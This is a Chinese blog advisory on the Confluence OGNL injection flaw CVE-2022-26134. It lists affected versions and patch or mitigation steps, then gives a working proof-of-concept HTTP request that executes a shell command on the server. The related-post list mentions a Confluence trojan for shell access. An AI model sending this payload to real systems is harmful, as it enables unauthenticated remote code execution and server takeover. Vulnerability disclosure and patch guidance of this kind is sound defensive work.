Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)风险通告及POC复现

已于 2022-06-07 11:45:16 修改
阅读量3k 收藏 3
点赞数
分类专栏: 漏洞预警 文章标签: 安全 web安全 运维
于 2022-06-07 11:44:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18209847/article/details/125162413
版权

一、背景介绍

近日,信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134)远程代码执行漏洞。

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,可以用于企业团队共享信息、文档协作、集体讨论,信息推送。

1.1 漏洞描述

在Atlassian Confluence Server and Data Center上存在OGNL注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式,造成远程执行代码并部署WebShell。
目前已发现在野利用,漏洞利用脚本已经放出,受影响单位尽快升级。

1.2 漏洞编号

CVE-2022-26134

1.3 漏洞等级

漏洞威胁等级:严重

二、修复建议

2.1 受影响版本

1

2

3

4

5

6

7

8

9

10

11

版本范围:

Confluence Server&Data Center ≥ 1.3.0

Atlassian Confluence Server and Data Center <7.4.17

Atlassian Confluence Server and Data Center <7.13.7

Atlassian Confluence Server and Data Center <7.14.3

Atlassian Confluence Server and Data Center <7.15.2

Atlassian Confluence Server and Data Center <7.16.4

Atlassian Confluence Server and Data Center <7.17.4

Atlassian Confluence Server and Data Center <7.18.1

2.2 修复建议

1、官方修复方案:
官方已发布版本 7.4.17、7.13.7、7.14.3、7.15.2、7.16.4、7.17.4 和 7.18.1,其中包含对此漏洞的修复。请尽快升级到新版本
下载地址:
Confluence Server Download Archives | Atlassian
Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

2、临时缓释方案:
下载官方发布的xwork-.0.3-atlassian-10.jar替换confluence/WEB-INF/lib/目录下原来的xwork jar文件,并重启Confluence
下载地址:
https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

2.3 参考链接:

Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

三、漏洞检测POC

漏洞复现

该漏洞利用方法十分简单,直接发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:

1

2

3

4

5

6

7

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1

Host: your-ip:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

1

其中使用到的OGNL表达式为

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id") 

大棉花哥哥
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
漏洞复现Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2180
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence
02-16
docker run --detach --publish 8090:8090 cptactionhank/atlassian-confluence:latest 然后只需将您喜欢的浏览器导航到http://[dockerhost]:8090并完成配置。 配置 您可以通过提供以下环境变量来配置少量内容 环境...
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
热爱学习,喜欢折腾!
10-09 1639
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞风险通告漏洞编号为CVE-2022-26134漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。
Atlassian Confluence 高危漏洞可导致代码执行
最新发布
smellycat000的专栏
06-05 67
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士SonicWall Capture Labs 的研究团队发现了 Atlassian Confluence Data Center and Server 中的一个远程代码执行漏洞。该漏洞的编号是CVE-2024-21683,CVSS评分为8.3,可导致认证攻击者执行任意代码。要利用该漏洞,攻击者必须具有对易受攻击系统的网络访问权限,并拥有增加新的宏...
Atlassian Confluence 远程代码执行漏洞分析(CVE-2023-22518)
hackzkaq的博客
11-09 603
由于漏洞易于利用且具有严重破坏性(导致数据丢失), 因此本文章中不会公开该漏洞的利用程序. 感兴趣的读者, 可以按照文章中的思路来复现漏洞. 请注意, 本文仅供学习目的使用.
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134复现
weixin_42489549的博客
06-29 8668
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence远程代码执行漏洞CVE-2022-26134
tpaer的博客
12-09 1586
之前看到过Confluence这个洞没太在意以为没什么人用,结果在自己公司遇到了,简单复现一下。
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 481
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
atlassian-confluence-6.15.1-x64.bin.tar.gz
10-21
Confluence基于Java技术栈,采用Web应用服务器(如Tomcat)进行部署,并且提供了一个名为`atlassian-confluence-6.15.1-x64.bin`的可执行文件,这通常是一个包含所有运行所需组件的自解压文件,包括服务器、数据库...
Atlassian-Confluence-Trojan:Atlassian-Confluence-Trojan
05-17
Atlassian-Confluence-Trojan Ref: Atlassian-Confluence-Trojan Get a shell by deploy this Trojan-Marco 制作方法: 先将quote-macro-1.0.jar解压 将 UpdateMethod.java 中的{path}替换为目录的绝对路径 然后...
atlassian-confluence-6.15.7-x64.bin
09-10
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
docker-atlassian-confluence-data-center:Dockerized Atlassian Confluence Data Center 用于插件开发期间的本地测试
05-29
Docker Atlassian Confluence 数据中心 使用 Docker 启动,以便在插件开发期间进行本地测试。 它启动一个PostgreSQL数据库,几个Confluence群集节点和Apache2 HTTPD作为粘性会话负载平衡器。 共享的 confluence-...
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞复现
网安君的博客
06-07 2823
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
安全漏洞通告Atlassian Confluence远程代码执行漏洞方案
bocco的博客
06-07 714
安全狗应急响应中心监测到,Atlassian官方发布安全通告,披露了Confluence Server和Confluence Data Center中存在的一个远程代码执行漏洞漏洞编号CVE-2022-26134。可导致攻击者无需身份验证远程执行任意代码等危害。...
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5103
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
Atlassian Confluence_远程代码执行(CVE-2022-26134)
Blue的博客
06-06 1547
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 和 Data Center 存在OGNL 注入漏洞,该漏洞源于Confluence,xwork-1.0.3-atlassian-8.jar 对 OGNL 表达式过滤不严谨,导致存在 OGNL 表达式注入漏洞,攻击者可以通过构造发送特定HTTP请求利用此漏洞。成功利用后可对 Confluence
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)安全风险通告
smellycat000的专栏
01-16 771
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Atlassian Confluence 远程代码执行漏洞漏洞编号QVD-2024-2746,CVE-2023-22527公开时间2024-01-16影响量级十万级奇安信评级高危CVSS 3.1分数10.0威胁类型代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身份验证的远程攻击者可以...
confluence统计_【漏洞预警】confluence远程代码执行漏洞(CVE-2019-3396)
weixin_30716611的博客
12-28 482
概述近日,白帽汇安全研究院监测到互联网上出现了Confluence远程代码执行漏洞Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。利用该漏洞可以读取服务器上任意文件,进而可以包含恶意文件来执行代码。可能造成敏感信息泄露,服务器被控制等严重后果。分布情况根据FOFA的数据统计,全球...
漏洞复现--Confluence远程代码执行漏洞CVE-2023-22527)
qq_53003652的博客
01-23 1311
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。微步漏洞团队于近日捕获到Confluence远程代码执行漏洞CVE-2023-22527)情报,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行
CVE-2021-26086
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入漏洞造成的,攻击者可以通过发送经过修改的HTTP请求,注入恶意代码,从而远程执行代码Atlassian已经发布了相关的安全公告,并提供了补丁程序。如果您正在使用受影响的版本,请立即更新到最新版本以保护您的系统安全
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大棉花哥哥

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值